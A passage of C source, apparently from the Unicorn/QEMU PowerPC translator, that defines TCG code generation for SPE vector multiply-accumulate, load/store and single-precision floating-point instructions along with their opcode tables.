gen_load_gpr64(tcg_ctx, tmp, rD(ctx->opcode)); tcg_gen_st_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_acc)); tcg_temp_free_i64(tcg_ctx, tmp); } static inline void gen_evmwsmiaa(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 acc = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_evmwsmi(ctx); /* rD := rA * rB */ acc = tcg_temp_new_i64(tcg_ctx); tmp = tcg_temp_new_i64(tcg_ctx); /* tmp := rD */ gen_load_gpr64(tcg_ctx, tmp, rD(ctx->opcode)); /* Load acc */ tcg_gen_ld_i64(tcg_ctx, acc, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_acc)); /* acc := tmp + acc */ tcg_gen_add_i64(tcg_ctx, acc, acc, tmp); /* Store acc */ tcg_gen_st_i64(tcg_ctx, acc, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_acc)); /* rD := acc */ gen_store_gpr64(tcg_ctx, rD(ctx->opcode), acc); tcg_temp_free_i64(tcg_ctx, acc); tcg_temp_free_i64(tcg_ctx, tmp); } GEN_SPE(evaddw, speundef, 0x00, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); //// GEN_SPE(evaddiw, speundef, 0x01, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); GEN_SPE(evsubfw, speundef, 0x02, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); //// GEN_SPE(evsubifw, speundef, 0x03, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); GEN_SPE(evabs, evneg, 0x04, 0x08, 0x0000F800, 0x0000F800, PPC_SPE); //// GEN_SPE(evextsb, evextsh, 0x05, 0x08, 0x0000F800, 0x0000F800, PPC_SPE); //// GEN_SPE(evrndw, evcntlzw, 0x06, 0x08, 0x0000F800, 0x0000F800, PPC_SPE); //// GEN_SPE(evcntlsw, brinc, 0x07, 0x08, 0x0000F800, 0x00000000, PPC_SPE); // GEN_SPE(evmra, speundef, 0x02, 0x13, 0x0000F800, 0xFFFFFFFF, PPC_SPE); GEN_SPE(speundef, evand, 0x08, 0x08, 0xFFFFFFFF, 0x00000000, PPC_SPE); //// GEN_SPE(evandc, speundef, 0x09, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); //// GEN_SPE(evxor, evor, 0x0B, 0x08, 0x00000000, 0x00000000, PPC_SPE); //// GEN_SPE(evnor, eveqv, 0x0C, 0x08, 0x00000000, 0x00000000, PPC_SPE); //// GEN_SPE(evmwumi, evmwsmi, 0x0C, 0x11, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(evmwumia, evmwsmia, 0x1C, 0x11, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(evmwumiaa, evmwsmiaa, 0x0C, 0x15, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evorc, 0x0D, 0x08, 0xFFFFFFFF, 0x00000000, PPC_SPE); //// GEN_SPE(evnand, speundef, 0x0F, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); //// GEN_SPE(evsrwu, evsrws, 0x10, 0x08, 0x00000000, 0x00000000, PPC_SPE); //// GEN_SPE(evsrwiu, evsrwis, 0x11, 0x08, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(evslw, speundef, 0x12, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); //// GEN_SPE(evslwi, speundef, 0x13, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); GEN_SPE(evrlw, evsplati, 0x14, 0x08, 0x00000000, 0x0000F800, PPC_SPE); // GEN_SPE(evrlwi, evsplatfi, 0x15, 0x08, 0x00000000, 0x0000F800, PPC_SPE); GEN_SPE(evmergehi, evmergelo, 0x16, 0x08, 0x00000000, 0x00000000, PPC_SPE); //// GEN_SPE(evmergehilo, evmergelohi, 0x17, 0x08, 0x00000000, 0x00000000, PPC_SPE); //// GEN_SPE(evcmpgtu, evcmpgts, 0x18, 0x08, 0x00600000, 0x00600000, PPC_SPE); //// GEN_SPE(evcmpltu, evcmplts, 0x19, 0x08, 0x00600000, 0x00600000, PPC_SPE); //// GEN_SPE(evcmpeq, speundef, 0x1A, 0x08, 0x00600000, 0xFFFFFFFF, PPC_SPE); //// /* SPE load and stores */ static inline void gen_addr_spe_imm_index(DisasContext *ctx, TCGv EA, int sh) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = rB(ctx->opcode); if (rA(ctx->opcode) == 0) { tcg_gen_movi_tl(tcg_ctx, EA, uimm << sh); } else { tcg_gen_addi_tl(tcg_ctx, EA, cpu_gpr[rA(ctx->opcode)], uimm << sh); if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, EA, EA); } } } static inline void gen_op_evldd(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); gen_qemu_ld64_i64(ctx, t0, addr); gen_store_gpr64(tcg_ctx, rD(ctx->opcode), t0); tcg_temp_free_i64(tcg_ctx, t0); } static inline void gen_op_evldw(DisasContext *ctx, TCGv addr) { gen_qemu_ld32u(ctx, cpu_gprh[rD(ctx->opcode)], addr); gen_addr_add(ctx, addr, addr, 4); gen_qemu_ld32u(ctx, cpu_gpr[rD(ctx->opcode)], addr); } static inline void gen_op_evldh(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_shli_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0, 16); gen_addr_add(ctx, addr, addr, 2); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_or_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rD(ctx->opcode)], t0); gen_addr_add(ctx, addr, addr, 2); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_shli_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0, 16); gen_addr_add(ctx, addr, addr, 2); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rD(ctx->opcode)], t0); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evlhhesplat(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_shli_tl(tcg_ctx, t0, t0, 16); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evlhhousplat(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evlhhossplat(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_qemu_ld16s(ctx, t0, addr); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evlwhe(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_shli_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0, 16); gen_addr_add(ctx, addr, addr, 2); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_shli_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0, 16); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evlwhou(DisasContext *ctx, TCGv addr) { gen_qemu_ld16u(ctx, cpu_gprh[rD(ctx->opcode)], addr); gen_addr_add(ctx, addr, addr, 2); gen_qemu_ld16u(ctx, cpu_gpr[rD(ctx->opcode)], addr); } static inline void gen_op_evlwhos(DisasContext *ctx, TCGv addr) { gen_qemu_ld16s(ctx, cpu_gprh[rD(ctx->opcode)], addr); gen_addr_add(ctx, addr, addr, 2); gen_qemu_ld16s(ctx, cpu_gpr[rD(ctx->opcode)], addr); } static inline void gen_op_evlwwsplat(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_qemu_ld32u(ctx, t0, addr); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evlwhsplat(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_shli_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0, 16); tcg_gen_or_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rD(ctx->opcode)], t0); gen_addr_add(ctx, addr, addr, 2); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_shli_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0, 16); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gprh[rD(ctx->opcode)], t0); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evstdd(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); gen_load_gpr64(tcg_ctx, t0, rS(ctx->opcode)); gen_qemu_st64_i64(ctx, t0, addr); tcg_temp_free_i64(tcg_ctx, t0); } static inline void gen_op_evstdw(DisasContext *ctx, TCGv addr) { gen_qemu_st32(ctx, cpu_gprh[rS(ctx->opcode)], addr); gen_addr_add(ctx, addr, addr, 4); gen_qemu_st32(ctx, cpu_gpr[rS(ctx->opcode)], addr); } static inline void gen_op_evstdh(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, t0, cpu_gprh[rS(ctx->opcode)], 16); gen_qemu_st16(ctx, t0, addr); gen_addr_add(ctx, addr, addr, 2); gen_qemu_st16(ctx, cpu_gprh[rS(ctx->opcode)], addr); gen_addr_add(ctx, addr, addr, 2); tcg_gen_shri_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], 16); gen_qemu_st16(ctx, t0, addr); tcg_temp_free(tcg_ctx, t0); gen_addr_add(ctx, addr, addr, 2); gen_qemu_st16(ctx, cpu_gpr[rS(ctx->opcode)], addr); } static inline void gen_op_evstwhe(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, t0, cpu_gprh[rS(ctx->opcode)], 16); gen_qemu_st16(ctx, t0, addr); gen_addr_add(ctx, addr, addr, 2); tcg_gen_shri_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], 16); gen_qemu_st16(ctx, t0, addr); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evstwho(DisasContext *ctx, TCGv addr) { gen_qemu_st16(ctx, cpu_gprh[rS(ctx->opcode)], addr); gen_addr_add(ctx, addr, addr, 2); gen_qemu_st16(ctx, cpu_gpr[rS(ctx->opcode)], addr); } static inline void gen_op_evstwwe(DisasContext *ctx, TCGv addr) { gen_qemu_st32(ctx, cpu_gprh[rS(ctx->opcode)], addr); } static inline void gen_op_evstwwo(DisasContext *ctx, TCGv addr) { gen_qemu_st32(ctx, cpu_gpr[rS(ctx->opcode)], addr); } #define GEN_SPEOP_LDST(name, opc2, sh) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv t0; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ gen_set_access_type(ctx, ACCESS_INT); \ t0 = tcg_temp_new(tcg_ctx); \ if (Rc(ctx->opcode)) { \ gen_addr_spe_imm_index(ctx, t0, sh); \ } else { \ gen_addr_reg_index(ctx, t0); \ } \ gen_op_##name(ctx, t0); \ tcg_temp_free(tcg_ctx, t0); \ } GEN_SPEOP_LDST(evldd, 0x00, 3); GEN_SPEOP_LDST(evldw, 0x01, 3); GEN_SPEOP_LDST(evldh, 0x02, 3); GEN_SPEOP_LDST(evlhhesplat, 0x04, 1); GEN_SPEOP_LDST(evlhhousplat, 0x06, 1); GEN_SPEOP_LDST(evlhhossplat, 0x07, 1); GEN_SPEOP_LDST(evlwhe, 0x08, 2); GEN_SPEOP_LDST(evlwhou, 0x0A, 2); GEN_SPEOP_LDST(evlwhos, 0x0B, 2); GEN_SPEOP_LDST(evlwwsplat, 0x0C, 2); GEN_SPEOP_LDST(evlwhsplat, 0x0E, 2); GEN_SPEOP_LDST(evstdd, 0x10, 3); GEN_SPEOP_LDST(evstdw, 0x11, 3); GEN_SPEOP_LDST(evstdh, 0x12, 3); GEN_SPEOP_LDST(evstwhe, 0x18, 2); GEN_SPEOP_LDST(evstwho, 0x1A, 2); GEN_SPEOP_LDST(evstwwe, 0x1C, 2); GEN_SPEOP_LDST(evstwwo, 0x1E, 2); /* Multiply and add - TODO */ #if 0 GEN_SPE(speundef, evmhessf, 0x01, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE);// GEN_SPE(speundef, evmhossf, 0x03, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmheumi, evmhesmi, 0x04, 0x10, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhesmf, 0x05, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhoumi, evmhosmi, 0x06, 0x10, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhosmf, 0x07, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhessfa, 0x11, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhossfa, 0x13, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmheumia, evmhesmia, 0x14, 0x10, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhesmfa, 0x15, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhoumia, evmhosmia, 0x16, 0x10, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhosmfa, 0x17, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwhssf, 0x03, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmwlumi, speundef, 0x04, 0x11, 0x00000000, 0xFFFFFFFF, PPC_SPE); GEN_SPE(evmwhumi, evmwhsmi, 0x06, 0x11, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwhsmf, 0x07, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwssf, 0x09, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwsmf, 0x0D, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwhssfa, 0x13, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmwlumia, speundef, 0x14, 0x11, 0x00000000, 0xFFFFFFFF, PPC_SPE); GEN_SPE(evmwhumia, evmwhsmia, 0x16, 0x11, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwhsmfa, 0x17, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwssfa, 0x19, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwsmfa, 0x1D, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evadduiaaw, evaddsiaaw, 0x00, 0x13, 0x0000F800, 0x0000F800, PPC_SPE); GEN_SPE(evsubfusiaaw, evsubfssiaaw, 0x01, 0x13, 0x0000F800, 0x0000F800, PPC_SPE); GEN_SPE(evaddumiaaw, evaddsmiaaw, 0x04, 0x13, 0x0000F800, 0x0000F800, PPC_SPE); GEN_SPE(evsubfumiaaw, evsubfsmiaaw, 0x05, 0x13, 0x0000F800, 0x0000F800, PPC_SPE); GEN_SPE(evdivws, evdivwu, 0x06, 0x13, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(evmheusiaaw, evmhessiaaw, 0x00, 0x14, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhessfaaw, 0x01, 0x14, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhousiaaw, evmhossiaaw, 0x02, 0x14, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhossfaaw, 0x03, 0x14, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmheumiaaw, evmhesmiaaw, 0x04, 0x14, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhesmfaaw, 0x05, 0x14, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhoumiaaw, evmhosmiaaw, 0x06, 0x14, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhosmfaaw, 0x07, 0x14, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhegumiaa, evmhegsmiaa, 0x14, 0x14, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhegsmfaa, 0x15, 0x14, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhogumiaa, evmhogsmiaa, 0x16, 0x14, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhogsmfaa, 0x17, 0x14, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmwlusiaaw, evmwlssiaaw, 0x00, 0x15, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(evmwlumiaaw, evmwlsmiaaw, 0x04, 0x15, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwssfaa, 0x09, 0x15, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwsmfaa, 0x0D, 0x15, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmheusianw, evmhessianw, 0x00, 0x16, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhessfanw, 0x01, 0x16, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhousianw, evmhossianw, 0x02, 0x16, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhossfanw, 0x03, 0x16, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmheumianw, evmhesmianw, 0x04, 0x16, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhesmfanw, 0x05, 0x16, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhoumianw, evmhosmianw, 0x06, 0x16, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhosmfanw, 0x07, 0x16, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhegumian, evmhegsmian, 0x14, 0x16, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhegsmfan, 0x15, 0x16, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhigumian, evmhigsmian, 0x16, 0x16, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhogsmfan, 0x17, 0x16, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmwlusianw, evmwlssianw, 0x00, 0x17, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(evmwlumianw, evmwlsmianw, 0x04, 0x17, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwssfan, 0x09, 0x17, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmwumian, evmwsmian, 0x0C, 0x17, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwsmfan, 0x0D, 0x17, 0xFFFFFFFF, 0x00000000, PPC_SPE); #endif /*** SPE floating-point extension ***/ #define GEN_SPEFPUOP_CONV_32_32(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)]); \ gen_helper_##name(tcg_ctx, t0, tcg_ctx->cpu_env, t0); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); \ tcg_temp_free_i32(tcg_ctx, t0); \ } #define GEN_SPEFPUOP_CONV_32_64(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); \ TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); \ gen_load_gpr64(tcg_ctx, t0, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, t1, tcg_ctx->cpu_env, t0); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t1); \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i32(tcg_ctx, t1); \ } #define GEN_SPEFPUOP_CONV_64_32(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); \ TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); \ tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); \ gen_helper_##name(tcg_ctx, t0, tcg_ctx->cpu_env, t1); \ gen_store_gpr64(tcg_ctx, rD(ctx->opcode), t0); \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i32(tcg_ctx, t1); \ } #define GEN_SPEFPUOP_CONV_64_64(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); \ gen_load_gpr64(tcg_ctx, t0, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, t0, tcg_ctx->cpu_env, t0); \ gen_store_gpr64(tcg_ctx, rD(ctx->opcode), t0); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_SPEFPUOP_ARITH2_32_32(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0, t1; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i32(tcg_ctx); \ t1 = tcg_temp_new_i32(tcg_ctx); \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); \ tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); \ gen_helper_##name(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); \ \ tcg_temp_free_i32(tcg_ctx, t0); \ tcg_temp_free_i32(tcg_ctx, t1); \ } #define GEN_SPEFPUOP_ARITH2_64_64(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0, t1; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ gen_load_gpr64(tcg_ctx, t0, rA(ctx->opcode)); \ gen_load_gpr64(tcg_ctx, t1, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); \ gen_store_gpr64(tcg_ctx, rD(ctx->opcode), t0); \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ } #define GEN_SPEFPUOP_COMP_32(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0, t1; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i32(tcg_ctx); \ t1 = tcg_temp_new_i32(tcg_ctx); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); \ tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); \ gen_helper_##name(tcg_ctx, cpu_crf[crfD(ctx->opcode)], tcg_ctx->cpu_env, t0, t1); \ \ tcg_temp_free_i32(tcg_ctx, t0); \ tcg_temp_free_i32(tcg_ctx, t1); \ } #define GEN_SPEFPUOP_COMP_64(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0, t1; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ gen_load_gpr64(tcg_ctx, t0, rA(ctx->opcode)); \ gen_load_gpr64(tcg_ctx, t1, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, cpu_crf[crfD(ctx->opcode)], tcg_ctx->cpu_env, t0, t1); \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ } /* Single precision floating-point vectors operations */ /* Arithmetic */ GEN_SPEFPUOP_ARITH2_64_64(evfsadd); GEN_SPEFPUOP_ARITH2_64_64(evfssub); GEN_SPEFPUOP_ARITH2_64_64(evfsmul); GEN_SPEFPUOP_ARITH2_64_64(evfsdiv); static inline void gen_evfsabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_andi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], ~0x80000000); tcg_gen_andi_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)], ~0x80000000); } static inline void gen_evfsnabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_ori_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], 0x80000000); tcg_gen_ori_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)], 0x80000000); } static inline void gen_evfsneg(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_xori_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], 0x80000000); tcg_gen_xori_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)], 0x80000000); } /* Conversion */ GEN_SPEFPUOP_CONV_64_64(evfscfui); GEN_SPEFPUOP_CONV_64_64(evfscfsi); GEN_SPEFPUOP_CONV_64_64(evfscfuf); GEN_SPEFPUOP_CONV_64_64(evfscfsf); GEN_SPEFPUOP_CONV_64_64(evfsctui); GEN_SPEFPUOP_CONV_64_64(evfsctsi); GEN_SPEFPUOP_CONV_64_64(evfsctuf); GEN_SPEFPUOP_CONV_64_64(evfsctsf); GEN_SPEFPUOP_CONV_64_64(evfsctuiz); GEN_SPEFPUOP_CONV_64_64(evfsctsiz); /* Comparison */ GEN_SPEFPUOP_COMP_64(evfscmpgt); GEN_SPEFPUOP_COMP_64(evfscmplt); GEN_SPEFPUOP_COMP_64(evfscmpeq); GEN_SPEFPUOP_COMP_64(evfststgt); GEN_SPEFPUOP_COMP_64(evfststlt); GEN_SPEFPUOP_COMP_64(evfststeq); /* Opcodes definitions */ GEN_SPE(evfsadd, evfssub, 0x00, 0x0A, 0x00000000, 0x00000000, PPC_SPE_SINGLE); // GEN_SPE(evfsabs, evfsnabs, 0x02, 0x0A, 0x0000F800, 0x0000F800, PPC_SPE_SINGLE); // GEN_SPE(evfsneg, 